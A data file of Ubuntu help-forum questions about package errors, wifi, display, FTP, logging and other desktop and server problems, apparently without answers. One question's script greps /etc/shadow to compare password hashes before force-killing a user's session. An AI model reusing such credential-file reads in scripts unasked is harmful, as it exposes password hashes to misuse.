443141	update manager and apt-get are not able to finish updates due to `` permission denied '' errors in post install scripts	on my desktop ubuntu 10.04 today some packages ( ca-certificates , postgres , samba , ... ) were updated automatically by the update-manager and something went wrong . the update finished with error messages . and now it is not possible any more to install or uninstall anything . i tried to upgrade to ubuntu 12.04 but this gives the same sort of errors . these are the error message ( in german ) that are now preventing from any changes : $ sudo apt-get upgrade paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut status-informationen einlesen ... fertig die folgenden pakete sind zurückgehalten worden : google-chrome-stable 0 aktualisiert , 0 neu installiert , 0 zu entfernen und 1 nicht aktualisiert . 8 nicht vollständig installiert oder entfernt . nach dieser operation werden 0b plattenplatz zusätzlich benutzt . möchten sie fortfahren [ j/n ] ? j richte install-info ein ( 4.13a.dfsg.1-5ubuntu1 ) ... /var/lib/dpkg/info/install-info.postinst : 36 : update-info-dir : permission denied dpkg : fehler beim bearbeiten von install-info ( -- configure ) : unterprozess installiertes post-installation-skript gab den fehlerwert 126 zurück richte ca-certificates-java ein ( 20110426ubuntu0.10.04.2 ) ... dpkg ( unterprozess ) : kann installiertes post-installation-skript nicht ausführen : keine berechtigung dpkg : fehler beim bearbeiten von ca-certificates-java ( -- configure ) : unterprozess installiertes post-installation-skript gab den fehlerwert 2 zurück richte samba-common ein ( 2:3.4.7~dfsg-1ubuntu3.14 ) ... /var/lib/dpkg/info/samba-common.postinst : 122 : ucf : permission denied dpkg : fehler beim bearbeiten von samba-common ( -- configure ) : unterprozess installiertes post-installation-skript gab den fehlerwert 126 zurück dpkg : abhängigkeitsprobleme verhindern konfiguration von samba-common-bin : samba-common-bin hängt ab von samba-common ( > = 2:3.4.0~pre1-2 ) ; aber : paket samba-common ist noch nicht konfiguriert . dpkg : fehler beim bearbeiten von samba-common-bin ( -- configure ) : abhängigkeitsprobleme - lasse es unkonfiguriert dpkg : abhängigkeitsprobleme verhindern konfiguration von samba : samba hängt ab von samba-common ( = 2:3.4.7~dfsg-1ubuntu3.14 ) ; aber : paket samba-common ist noch nicht konfiguriert . samba hängt ab von samba-common-bin ; aber : paket samba-common-bin ist noch nicht konfiguriert . dpkg : fehler beim bearbeiten von samba ( -- configure ) : abhängigkeitsprobleme - lasse es unkonfiguriert dpkg : abhängigkeitsprobleme verhindern konfiguration von smbclient : smbclient hängt ab von samba-common ( = 2:3.4.7~dfsg-1ubuntu3.14 ) ; aber : paket samba-common ist noch nicht konfiguriert . dpkg : fehler beim bearbeiten von smbclient ( -- configure ) : abhängigkeitsprobleme - lasse es unkonfiguriert dpkg : abhängigkeitsprobleme verhindern konfiguration von smbfs : smbfs hängt ab von samba-common ( = 2:3.4.7~dfsg-1ubuntu3.14 ) ; aber : paket samba-common ist noch nicht konfiguriert . dpkg : fehler beim bearbeiten von smbfs ( -- configure ) : abhängigkeitsprobleme - lasse es unkonfiguriert dpkg : abhängigkeitsprobleme verhindern konfiguration von winbind : winbind hängt ab von samba-common ( = 2:3.4.7~dfsg-1ubuntu3.14 ) ; aber : paket samba-common ist noch nicht konfiguriert . dpkg : fehler beim bearbeiten von winbind ( -- configure ) : abhängigkeitsprobleme - lasse es unkonfiguriert fehler traten auf beim bearbeiten von : install-info ca-certificates-java samba-common samba-common-bin samba smbclient smbfs winbind e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried to find the files that lead to the `` permission denied '' ( = '' keine berechtigung '' ) error , but i just do n't get it . for example executing one one of the post install scripts that can not be executed manually gives `` permission denied '' $ sudo /var/lib/dpkg/info/ca-certificates-java.postinst -- configure sudo : unable to execute /var/lib/dpkg/info/ca-certificates-java.postinst : keine berechtigung but i can not see why , the permissions seem ok to me : $ ls -l /var/lib/dpkg/info/ca-certificates-java.postinst -rwxr-xr-x 1 root root 1759 2014-03-05 17:07 /var/lib/dpkg/info/ca-certificates-java.postinst can anybody give me a hint what i should do to get rid of these errors and get my working system back ?
443142	how to use foxpro on ubuntu	i want to run foxpro 2.6 ( foxprox.exe ) on ubuntu . anybody can guide me how to use this ? i have tried wine and dosemu for creating dos environment , but unsuccessful . i have windows2008 server and want to map one of drive as x : in ubuntu . want help ... ..
443143	wifi issues with fresh install of 12.04.4	ca n't seem to get the computer to connect . the network shows up and it will begin to connect but after about a minute , it 'll ask me for the network password . i enter the password and it continues to say `` connecting '' but after a while , it asks for the password again . it just keeps trying to connect , then ask for password , try to connect , ask for password , etc ad nauseam . i double checked the password on a different computer and it is correct . the ubuntu comp does n't say invalid password or denied or anything . it just keeps asking for the pw over and over without ever establishing a connection .
443144	speakers are n't functioning properly	i have a dell vostro 2520 with ubuntu 12.04 lts . it has only a front left and a front right speaker . the front right speaker suddenly stopped working . how do i fix this ?
443148	wifi not working 13.10 on inspiron 1525	i have literally tried everything , i really do n't know if i have tried everything . my wifi for ubuntu is not working and in order to install i need wifi , now i had wifi when i was trying ubuntu after installation i lost wifi . i have tried almost everything from terminal and re installing it . my windows side however has wifi but my ubuntu does n't work . only when i am trying ubuntu then the wifi works after installation the wifi does n't connect . i seriously need help , please help me solve my problem or tell what is going on . thank you .
443149	maas network connections	i have looked and looked , but can not find a drawing that will help.. maybe someone can answer a question ? ? i just need to know what connections to make on my servers to enable maas . server nic one to outside network server nic 2 to switch maas client1 switch to ilo2 ? maas client1 switch to em1 ? i need to know if on the maas clients i need two connections.. one to the ilo port and one to a nic ? on the maas controller , just a connection to the real world and a connection to the maas switch ? ? help , please ! roger
443150	is it possible to assign an ip address range as an alias ?	need to add 128 ip addresses as an alias . i was wondering if instead of doing eth0:1 , eth0:2 , ... eth0:128 , i may be able to add them all as a single block . i know that in rh flavors of linux that is possible in the following way : [ root @ tecmint network-scripts ] # vi ifcfg-eth0-range0 # device= '' eth0 '' # bootproto=none # nm_controlled= '' yes '' # onboot=yes type= '' ethernet '' ipaddr_start=172.16.16.126 ipaddr_end=172.16.16.130 ipv6init=no # gateway=172.16.16.100 source : http : //www.tecmint.com/create-multiple-ip-addresses-to-one-single-network-interface/
443152	source code for ubuntu donations page	the ubuntu donations page has a cool feature where it divvies up donations according to how the user wants them . i noticed another website using it , is it part of a standard js library or does ubuntu publish the source somewhere ?
443153	ubuntu 14.04 can only boot to terminal	on boot up my computer will only boot up in the terminal . when i type sudo startx , the screen becomes blank and never loads up . i have a radeon hd card not sure the exact number and i am using the fglrx-update driver . apparently in the log files it says i am missing a device section for instance busid pci:0 @ 1:0:1 . i have no idea what this means . i have already tried reinstalling that driver series but it does n't seem to be working . i am trying to install the fglrx driver and see if that fixes the issue . but seriously does anybody know why that driver just suddenly stopped working after i updated the kernel ? for anybody that is also having this issue please check out https : //bugs.launchpad.net/ubuntu/+bug/1302771 . i have posted my bug report and solution there . if you have any extra information as to why this bug is occurring , have had this bug occur or have alternative solutions , please post them there . i am pretty sure the ubuntu developers would find it helpful .
443155	window steam games not working	i installed steam through playonlinux ( and installed wine ) i opened up steam , downloaded hawken , and tried running it . a little window will pop up saying `` preparing to launch hawken '' then it 'll close and nothing will happen . am i doing something wrong ? i want to get cod to work on linux also .
443157	brightness resets when lid is closed and opened .	so my brightness with the slider in settings was n't working before i edited in /etc/default/grub this grub_cmdline_linux= '' '' to this grub_cmdline_linux= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' now the brightness sticks if i restart . now the problem is if i close the lid and open it again my brightness resets to where i ca n't read anything anymore . if i do sudo su echo 250 > /sys/class/backlight/intel_backlight/brightness in terminal i can set my brightness to 250 , my max being 976 . so what i ended up doing is putting echo 250 > /sys/class/backlight/intel_backlight/brightness in /etc/rc.local and the brightness is still resetting when i close and open the lid . i found that anything in /etc/pm/sleep.d/ runs after/on suspension so what i did was : sudo touch /etc/pm/sleep.d/0000-brightness sudo chmod a+x /etc/pm/sleep.d/0000-brightness sudo geany /etc/pm/sleep.d/0000-brightness and within 0000-brightness i put # ! /bin/bash case `` $ 1 '' in thaw|resume ) echo 250 > /sys/class/backlight/intel_backlight/brightness ; ; * ) ; ; esac exit $ ? i also put it in /usr/lib/pm-utils/sleep.d/ as well . and now it goes from completely bright > 250 brightness > no brightness . so the only thing that has changed is that is goes to 250 brightness before resetting to 0 brightness . my laptop is http : //www.linlap.com/acer_aspire_s3 . i 'm really frustrated because i have spent way too much time trying to get this to work . any ideas ? i posted on reddit , you can check out the process we went through here http : //www.reddit.com/r/elementaryos/comments/221shp/brightness_resets_when_lid_is_closed_and_opened/
443159	how can i extract the dsdt ( differentiated system description table ) of my notebook ?	i am planning to convert my t420s notebook to a hackintosh notebook . but i currently ca n't boot the hackintosh installer . someone said i could save and extract the dsdt in linux , which would help me with installing the hackintosh os . i am wondering how to extract the dsdt and save it on ubuntu . ( i am using a live usb boot of ubuntu 13.10 )
443160	help plz . screen power down & lock will not work .	so i have a problem here . i have it set so that my screen turns off after 30 mins of inactivity and so that the screen will lock after the screen is turned off . only thing is is that it is not working . i leave for an hour and the damn screen is still on . any tips ?
443162	wifi suddenly stopped working on laptop	i have an asus u56e laptop . i have been using the wifi in my apartment for months , but last night during a skype call the internet cut out . the connection to the router is still established , but there is no network connection . i tried rebooting to windows but i get a connection with no internet access . however , my other devices work on the wifi connection and my laptop works on other wifi connections still , so it is n't the card . i have no idea how to go about solving this . help would be much appreciated .
443175	video crossbars on bootup after ubuntu 13.10 install	i have installed ubuntu 13.10 , kicking w-xp to the curb , on an : asus m2n68-am se2 mb onboard video athlon 64/x2-4600 4gb ddr2-800 power supply : 520w after a successful install , on boot up , the monitor shows crossbars and is unreadable . any ideas ? i made another install with ubuntu/64 14.04 , but the same problem occurs . i borrowed a copy of ubuntu 10.10 , and that one works fine . my next move may be to add a video card and disable ( if possible ) the onboard video unit . could this be a software problem ?
443177	login image size aspect	i am new to ubuntu and i have what might be a basic question . when i login into ubuntu desktop 12.04 lts it has the same background as my user . i have the image centered with it set to “center” . however , the desktop that ask you to login has the same image but it stretched “zoom” and looks bad . here is the question . how do i or can i change the image to a different image than is on my user’s desktop and background color , aspect on the login desktop ? thanks in advance for the help , llama
443178	how to keep the code running even after the gui frontend is exited ?	i am writing a shell script that runs upon start-up using xterm and asks the user to do things i want him to do . for example , the code is supposed to ask the user to change his password in 1 minute . if the password is n't changed , the script logs out the user . the problem is that if the user closes the display he will stop the code from being executed . i want to prevent this . oldpass= $ ( grep $ user /etc/shadow ) echo `` you have 1 minute to change your password '' sleep 60 newpass= $ ( grep $ user /etc/shadow ) if [ [ oldpass == newpass ] ] then pkill -u $ user fi i want to add the condition `` and , if xterm is closed then logout ''
443182	arrows next to launcher icons in unity 2d	what do the tiny white arrows next to the icons in the unity 2d launcher mean ? sometimes there is one , often more . do they indicate the number of windows of that application that are open ?
443183	running mp3 file by vlc problem	i have a mp3 file which when i run that in terminal by vlc myprogram.mp3 . i saw these errors > [ 0xb4e07958 ] access_http access error : error : http/1.1 403 forbidden [ 0xb4e07958 ] access_http access error : error : http/1.1 403 forbidden [ 0xb4e07958 ] access_mms access error : error : http/1.1 403 forbidden [ 0xb4e03250 ] main art finder error : no suitable access module for `http : //www.anotherwebsite.fm/music/www.website.info/www.website.info' what is this http error ! i just wan na run my mp3 by vlc in my computer ? but also my mp3 file was playing . i just saw those on my termianl
443186	what 's the use of complete command ?	while running the complete command on my gnome-terminal , it shows some commands.what are they ? and what is the use of complete command ? $ complete complete -f _minimal complete -f _filedir_xspec oodraw complete -f _filedir_xspec elinks complete -f _filedir_xspec freeamp complete -f _longopt split complete -f _longopt sed complete -f _longopt ld complete -f _longopt grep complete -f _service /etc/init.d/vboxweb-service complete -f _service /etc/init.d/vboxballoonctrl-service complete -f _service /etc/init.d/rc complete -f _service /etc/init.d/nmbd complete -f _service /etc/init.d/halt complete -j -p ' '' % ' -s ' '' ' jobs complete -d pushd list goes long , so i posted some of the them .
443187	terrible battery life	i have an acer aspire one ao722 netbook that was getting ~7-8+ hours of battery life when using windows 7 home premium . i figured , heck if i put ubuntu and an ssd on this thing , i 'd be able beat that handily as i 've read that linux has much less overhead and that an ssd is so much more efficient than a hdd . well ... not so much . i 'm lucky if i get more than 2 hours on it now . since this is horrible for a netbook i 'm thinking of doing the unthinkable , putting windows back on . i 've seen lots of similar complaints on earlier versions of unbuntu ( i 'm using 13.10 ) but no solutions that have worked for those others . here 's to hoping that i 'll have some better luck in that someone can tell me what i 'm doing wrong here before i dump unbuntu in favor of an os ( windows ) that will give me the battery life one can expect from a low power computer like a netbook . any help would be great . i 'm brand new to ubuntu ( linux ) and was really hoping to make the switch from microsoft for good . thank you
443189	update manager ( damaged )	i hope you can help me ! i know there are a lot of questions and answers concerning the update manager on this form but i thought i just ask you a specific question i have and i dont find a clear answer . when i want to update a computer at the university where i work , it has 400+ updates ready to be installed , the update manager says that it cant install it because it is damaged . must i re-install the os or is there a way to fix the update manager ( because the computer is starting to give problems , and i am pretty sure that it is what is needed ) . ps . i have also tried sudo apt-get update and sudo apt-get upgrade with no success . thank you so much for your help in advance !
443190	prestashop `` recursive write permissions '' error	trying to install prestashop locally ( lamp ) , the following error list prevents installation from moving forward . permissions on files and folders recursive write permissions for www-data user on ~/config/ recursive write permissions for www-data user on ~/cache/ recursive write permissions for www-data user on ~/log/ recursive write permissions for www-data user on ~/img/ recursive write permissions for www-data user on ~/mails/ recursive write permissions for www-data user on ~/modules/ recursive write permissions for www-data user on ~/themes/default-bootstrap/lang/ recursive write permissions for www-data user on ~/themes/default-bootstrap/pdf/lang/ recursive write permissions for www-data user on ~/themes/default-bootstrap/cache/ recursive write permissions for www-data user on ~/translations/ recursive write permissions for www-data user on ~/upload/ recursive write permissions for www-data user on ~/download/ also , running the following commands resulted in `` operation not permitted '' messages cd /var/www/prestashop chown -r www-data * chgrp -r www-data *
443192	huawei usb stick ec169 not connecting on ubuntu 10.10	i am working on ubuntu 10.10 and i have to use huawei ec169 usb stick for connectivity . the problem is it shows up as mobile broadband but does n't connect . when i click on the sign again it tells me that it 's disconnected . i need your help . thanking in advance .
443193	how to install mysql without root access ?	i found this article that explains how to install mysql without root access . however , on the mysql download page is no download link for ubuntu . which one should i choose in this case ? if it has a `` generic linux '' choice that claims to be architecture-independent , why does it need all the other dependent ones ? lastly , i do n't know its dependencies . since i can not use a package manager ( because i do n't have root - yargs ! ) , i need to resolve everything manually . how do i do that ?
443196	unable to login to my account using terminal	i was trying to add some lines to the end of .bashrc file by following instructions to install rvm on ubuntu 12.04 , now when i am putting in password after doing a sudo su the terminal freezes . following are the contents of .bashrc can someone please guide me what should i do to bring things back to the old working self , any help would be much appreciated .
443205	less.vim not working on my ubuntu 12.04 lts	i found many sites saying that vim can be used as a pager like less with syntax highlighting . so to make it work i added this line to my .bash_aliases file : alias vless='vim -u /usr/share/vim/vim73/macros/less.vim' but when i run something like ps -a | vless it gives this output and exits without showing me the output of ps : vim : warning : input is not from a terminal please help !
443206	how to read older login info by the `` last '' command ?	the last command may show too few lines of user login info , truncated by when the “wtmp begins” . if i want to get as much as possible last info ( e.g. , to see if my system was accessed from any unknown/suspicious ip using my username ) , how can i output the older “last” info ? if i use last -2000 , intending to see 2000 lines of output , but the command may only return just a few lines , anything that happened before the “wtmp begins” would be truncated . ) just wondering somehow if it is possible to output as many lines of login info as possible .
443209	how do i play a game i installed by disk ?	i installed call of duty 4 : modern warfare with wine and it installed correctly but i do not know how to launch it . it comes up with an error that i do not have the disk inserted but i do . i am running ubuntu 12.04.1
443210	working way on creating a root ftp user	there are many work arounds for this . one of those i 've done : adduser username chown -r username /directory/ chmod -r 755 /directory/ i 'm using flashfxp on windows which ends to [ r ] user xxx [ r ] 331 password required for xxx [ r ] pass ( hidden ) [ r ] 530 login incorrect . [ r ] connection failed but i wan na make a ftp user on root ~ directory . also tried : adding /bin/false to /etc/shells nano /etc/shells useradd userftp -p mypass -d /home -s /bin/false passwd userftp /etc/init.d/proftpd start ca n't login either ! proftpd.conf servername `` myserver '' servertype standalone port 21 passiveports 35000 35999 usereversedns off timesgmt off timeoutlogin 120 timeoutidle 600 timeoutnotransfer 900 timeoutstalled 3600 scoreboardfile /var/run/proftpd/proftpd.pid transferlog /var/log/proftpd/xferlog.legacy logformat default `` % h % l % u % t \ '' % r\ '' % s % b '' logformat auth `` % v [ % p ] % h % t \ '' % r\ '' % s '' logformat write `` % h % l % u % t \ '' % r\ '' % s % b '' # do n't modify this log format . it 's used by directadmin to determine user usage logformat userlog `` % u % b % m % a '' extendedlog /var/log/proftpd/xxx.xxx.xxx.xxx.bytes write , read userlog authuserfile /etc/proftpd.passwd defaultserver on authorder mod_auth_file.c # authpam off < ifmodule mod_tls.c > tlsengine on tlslog /var/log/proftpd/proftpd.tls.log tlsprotocol sslv23 # tlsprotocol tlsv1 tlsverifyclient off tlsrequired off # certificates tlsrsacertificatefile /etc/exim.cert tlsrsacertificatekeyfile /etc/exim.key # tlscacertificatefile /etc/ftpd/root.cert.pem tlsciphersuite high : medium : +tlsv1 : ! sslv2 : +sslv3 < /ifmodule > < global > passiveports 35000 35999 deferwelcome on requirevalidshell no defaultroot ~ dirfakeuser on ftp dirfakegroup on ftp user ftp group ftp # useralias anonymous ftp allowstorerestart on allowretrieverestart on listoptions -a showsymlinks on < ifmodule mod_facts.c > # # enable this with proftpd 1.3.4b+ to fix filezilla mlsd # # http : //www.proftpd.org/docs/modules/mod_facts.html # factsoptions # factsoptions useslink < /ifmodule > umask 022 displaylogin welcome.msg displaychdir readme allowoverwrite yes identlookups off extendedlog /var/log/proftpd/access.log write , read write extendedlog /var/log/proftpd/auth.log auth auth # # paranoia logging level ... . # # extendedlog /var/log/proftpd/paranoid.log all default < ifmodule mod_tls.c > tlsengine on tlslog /var/log/proftpd/proftpd.tls.log tlsrsacertificatefile /etc/exim.cert tlsrsacertificatekeyfile /etc/exim.key < /ifmodule > < /global > include /etc/proftpd.vhosts.conf
443213	internal error in ubuntu 13.10 / problemtype : kerneloops / package : linux-image-3.11.0-19-generic 3.11.0-19.33	i 'm a fresh user of ( l ) ubuntu 13.10 . every time i start a session i get multiple times an error message , the first lines of which read executablepath /use/share/apport/apportcheckresume package linux-image-3.11.0-19-generic 3.11.0-19.33 problemtype kerneloops sorry , but i have n't enough reputation points to post a screenshot . is it grave ? how can i fix it and get rid of this tons of crash reports ? ( i 'm wondering if this has something to do with the fact that my laptop has a weird behaviour whenever at booting with no ac power supply : i always need to boot it twice . if you think this is relevant to the above issue , i can tell you more about it . ) thanks in advance for your help .
443214	connected secondry drive how to increase /home value	i had connected secondary hard drive in my computer , my primary hard drive value is full so how to increase the value of my /home partition .
443217	graphical presentation of codes	is there any tools which understand programming languages in ubuntu and make a graphical shapes or diagram of the code . i think it is better to describe my case i have a c++ code with more than 10 thousands line of code and i have to have a classifications of functions and their variables and the relation between these function . what i need is a graphical presentation of functions . for example when you pass your code or codes to that . this program show function is circle and by line between these circles , show their relation or who calls which . also when you click on the circle the arguments will show . is there anything in ubuntu to something like that .
443219	how to simplify the info contained in /var/log/auth.log	my /var/log/auth.log contains quite some lines such as '' reverse mapping checking getaddrinfo for 224.51.174.61.dial.wz.zj.dynamic.163data.com.cn [ 61.174.51.224 ] failed - possible break-in attempt ! '' `` failed password for root from 61.174.51.224 port 4227 ssh2 '' '' reverse mapping checking getaddrinfo for 187-101-166-232.dsl.telesp.net.br [ 187.101.166.232 ] failed - possible break-in attempt ! '' `` invalid user admin from 187.101.166.232 '' these i can see that the hackers failed to break in . but unfortunately i also see some logs such as successful su for xxxxxx ( my username ) by root my dumb questions are : from the auth.log , how can i tell that the `` successful su '' was by me , not by hackers who may have gained my login info ? how to filter the auth.log file so that it succinctly reports which user successfully logged in , for how long , and from where ? the ip addresses were indeed in the auth.log file , but it is not easy to see if they actually succeeded in breaking in . is there a log file to check what the hackers did ? thank you for any enlightenment .
443220	i want to lock my folder with password in ubuntu 12.04 .	i want to lock my folder with password in ubuntu 12.04 . is there any software for folder lock ? please suggest me how can i make this thing . thanks in advance
443221	broken dependencies	i am currently running lubuntu on my ubuntu 12.04 server version . whenever i try installing any software , be it from the software center or from the internet , i receive an error saying : your system has broken dependencies . this application can not continue until this is fixed . to fix it run : gksudo synaptic or sudo apt-get install -f in the terminal window but when i type sudo apt-get install -f in the terminal , i get the following error : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-58 linux-headers-3.2.0-58-generic xul-ext-ubufox use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-image-generic-lts-raring the following packages will be upgraded : linux-image-generic-lts-raring 1 upgraded , 0 newly installed , 0 to remove and 97 not upgraded . 2 not fully installed or removed . need to get 0 b/2,332 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-image-generic-lts-raring : linux-image-generic-lts-raring depends on linux-image-3.8.0-37-generic ; however : package linux-image-3.8.0-37-generic is not installed . dpkg : error processing linux-image-generic-lts-raring ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of linux-generic-lts-raring : linux-generic-lts-raring depends on linux-image-generic-lts-raring ; however : package linux-image-generic-lts-raring is not configured yet . dpkg : error processing linux-generic-lts-raring ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-image-generic-lts-raring linux-generic-lts-raring e : sub-process /usr/bin/dpkg returned an error code ( 1 ) please help .
443223	delete data off usb	there seems to be an annoying setting somewhere that goes like this . i copy some video files to a 1gb usb thumb drive , after watching the videos else where , i come back to ubuntu and delete the video files from the usb thumb drive . however after doing this a few times i realize that although i do n't see anything in the file manager , in fact the drive is full . to actually allow the system to write new files to the drive i then use gparted to reformat the usb thumb drive . is there a way to make it actually count the data that i delete at free space on the thumb drive ? or am i missing something all together ?
443227	sending a simple tcp message using netcat	i am trying to use netcat to send a simple message over tcp , e.g . i want to send the digit 1 . so i understood that i write the following in the terminal , after installing netcat netcat [ ip-address ] [ port ] but how do i specify the message to be sent ? i.e . where to i write `` 1 '' ?
443229	unable to add ppas that contain '- '	i have searched for this error and it seems i am the only one getting this problem . when i run , for example $ sudo add-apt-repository ppa : webupd8team/y-ppa-manager can not add ppa : 'ppa : webupd8team/y-ppa-manager ' . please check that the ppa name or format is correct . but when i add ppa 's without any special characters , it runs fine . so , i can add webupd8team/gnome3 , but when i try adding webupd8team/sublime-text-2 , the same error shows . does anybody know the reason and fix for this ? i am using ubuntu 13.10 thank you in advance . !
443232	log file rotation setting	it is a bit weird that in my /var/log dir , many files such as syslog , auth.log all seem to have older log files ( rotated by [ 0-9 ] , some like dpkg.log even rotates to 12 now ) , but the important wtmp log file only has a wtmp.1 rotation , which stores pretty recent log ( i have been using the laptop for several years , so in normal case it should have more wtmp logs ) . is it because of some system setting that prevents my laptop from storing more wtmp logs ? ( i do not recall that i changed the default setting for this . ) thank you .
443240	created a wireless network from my ubuntu , it ca n't be seen by nearby devices	i created a wireless network from my ubuntu , i wanted to connect to that network from my tablet ( i do n't want to share internet or anything , i just want both devices on the same network ) . but the tablet ( android ) could not detect the network i just created , when i try to define it in the tablet it says `` not in range ''
443241	grub resue error insmod normal file not found	i have a dual boot with windows 7 and ubuntu . using disk management in windows , i deleted the ubuntu partition , but when i restart my computer , i 'm getting grub rescue command . i tried ls ( hd0 , msdos6 ) and when i type insmod normal , it says file not found .
443244	e : error occurred while processing iw ( newversion2 )	i have upgraded to 12.04 from 11.10 . i am getting following error message e : problem parsing dependency depends e : error occurred while processing iw ( newversion2 ) e : problem with mergelist /var/lib/dpkg/status e : the package lists or status file could not be parsed or opened . i have tried the following command sudo rm -rf /var/lib/apt/lists/* sudo apt-get update ubuntu software center crashes with above error message .
443251	ubuntu one notices things are not in sync , but does n't actually sync	ubuntu one recognizes that some folders are not synced , but does not actually sync them . it used to work , but at some point i noticed some folders not being in sync anymore . no , i have n't reached my storage limits . starting the ubuntu one application results in a 'sorry , ubuntu 12.04 has experienced an internal error ' message . what is going on , and how can it be fixed ?
443259	bash excecuting each line of file and checking for sucess	i had a file with variable number of lines , and each line is a command , say , file1.txt : command1 command2 command3 my intention is to execute each line , and report `` good '' if the command is sucess . else report `` bad '' the command failed . i tried like below : while read line do $ i if [ $ ? -eq 0 ] then `` echo good '' fi `` echo bad '' done < file1.txt but this was not working . i know i am doing some silly issue here .
443261	helloworld.php display 0 value after download and configure apache2 , php and mysql	i have purchased the lenovo thinkpad r400 and currently , i am updating my ubuntu 's version . before the update from 12.04 to the current version , i have installed apache2 in my machine including mysql and php . mysql works very well as usual . but when i run the very simple php script , the input displayed was 0 . i just followed the step as ubuntu provides without putting any of my own code and decisions . i have checked my php version and it is 5.3 . i know it is an old version but it just followed with the specs and requirement of my laptop . so , i just want hear your opinions , do i need to upgrade my latest ubuntu version and then download the latest version of apache2 or just follow the link that i 've given before ?
443263	apache hadoop on openstack	i have deployed openstack ( with sahara ) via cloning devstack . now i want to deploy apache hadoop on openstack . i have searched a lot and everywhere i find tutorial same as this http : //architects.dzone.com/articles/openstack-savanna-fast-hadoop i want to ask that is there way to install apache hadoop via openstack horizon dashboard instead from kernel commands ?
443265	how can i cut videos with otrverwaltung when avidemux crashes ?	i use otrverwaltung ( version 0.9.1 ) to decode and cut videos from `` online tv recorder '' . otrverwaltung starts avidemux ( version : 1:2.5.4-0ubuntu13 ) , but this instantly crashes . ( here is what gets printed in the console . it seems to be related to this bug . ) what can i do to cut the videos ? is there other software that can do this ?
443266	how do i select gtk icon theme ?	i run lubuntu 13.10 with the window manager blackbox . i have set the gtk theme to lubuntu-default in settings.ini : $ cat ~/.config/gtk-3.0/settings.ini [ settings ] gtk-theme-name = lubuntu-default this makes gtk3 applications use the box icon theme ; in gpicview , for instance , the toolbar icons look like this : in gedit , however , the toolbar icons look like this : how do i make gedit use the box icon theme ?
443268	how to disable my internal wifi card ?	i 'm running a realtek rtl8188ee , and considering how many problems people are having with it that i read , i decided to order a panda wireless usb . it should be in the mail today or tomorrow , so i 'd like to be prepared to just pop it in and start using it . here 's the card info # 05:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter [ 10ec:8179 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec:0191 ] kernel driver in use : rtl8188ee i 'm running off ethernet till i get it so wo n't be without internet .
443271	files not present in windows 8	i had downloaded a file while using ubuntu . but ca n't find the same file while in my machine while using windows 8 .
443273	can not read filenames that are in utf8 encoding ( greek characters )	i 've downloaded some files using `` download as .zip '' option provided by dropbox . the filenames contain greek characters . i 've extracted them and all i get is this : 2013 î§îµî¹î¼îµïî¹î½ï.pdf the files were probably named/created on windows os , with greek locale . i 've looked into it and installed convmv utility but when using this command : 1st attempt : convmv -t utf8 ./2013 î§îµî¹î¼îµïî¹î½ï.pdf , i got this output : your perl version has fleas # 37757 # 49830 starting a dry run without changes ... skipping , already utf-8 : ./2013 î§îµî¹î¼îµïî¹î½ï.pdf no changes to your files done . use -- notest to finally rename the files . so , the filenames are already in utf8 but arent't properly displayed . 2nd attempt : searched for greek encodings and found these two iso 8859-7 and windows-1253 . tried with the 1st one and got that iso-8859-7 does n't cover all needed characters for : `` ./2013 î§îµî¹î¼îµïî¹î½ï.pdf '' . so no luck with this as well . i then used convmv -- list and windows-1253 did n't appear . so i am out of ideas , is there something i can do to fix this ?
443274	how to make original /etc/fstab ?	how to make original /etc/fstab ? ? thanks root @ gateway : ~ # fdisk -l disk /dev/sda : 80.0 gb , 80026361856 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156301488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00033c3d device boot start end blocks id system /dev/sda1 * 2048 70311935 35154944 83 linux /dev/sda2 70311936 148436991 39062528 83 linux /dev/sda3 148439038 156301311 3931137 5 extended /dev/sda5 148439040 156301311 3931136 82 linux swap / solaris disk /dev/mapper/cryptswap1 : 4025 mb , 4025483264 bytes 255 heads , 63 sectors/track , 489 cylinders , total 7862272 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x27dc0ef5 disk /dev/mapper/cryptswap1 does n't contain a valid partition table root @ gateway : ~ #
443280	disk space issues	i have total 70 gb in drive from 160 gb of hard drive in which ubuntu is installed and in that drive 20 gb is free space , still ubuntu keep giving me pop up that not enough free space . here is the output of df -h filesystem size used avail use % mounted on /dev/loop0 10g 9.3g 193m 98 % / udev 1.6g 4.1k 1.6g 1 % /dev tmpfs 315m 930k 314m 1 % /run none 5.3m 0 5.3m 0 % /run/lock none 1.6g 365k 1.6g 1 % /run/shm /dev/sda6 81g 59g 22g 74 % /host how to get that solved ?
443283	loss of data after mistake on ubuntu one	i used the service `` ubuntu one '' so as to save some of my personal data on a cloud . a few weeks ago , i changed my os deleting all my data from myhard drive . as i tried to restore my data , i selected unfortunately the option `` stop syncing this folder '' . now , i ca n't get the files any more . some of them are very important for my work . i tried to contact the ubuntu-one support but i received no answer . i hope my data is still on their drives and that they 'll be able to give me it back . would you know how i could do ? or who i could contact ? thanks a lot geoffrey
443284	xbmc and power saving	i have set up my xbmc system on my asus x401a laptop . i am now getting towards the stage where most of my film collection is on an external hard drive and as such i will be putting it closed on a shelf . i have already set it up so that it functions properly when closed , but obviously this makes it tricky to get to the power button . is there a way to have my laptop sleep when it is not in use , but then wake up using the yatse android app ? any help is greatly appreciated since i 'm still fairly new to both ubuntu and xbmc . thanks , rob
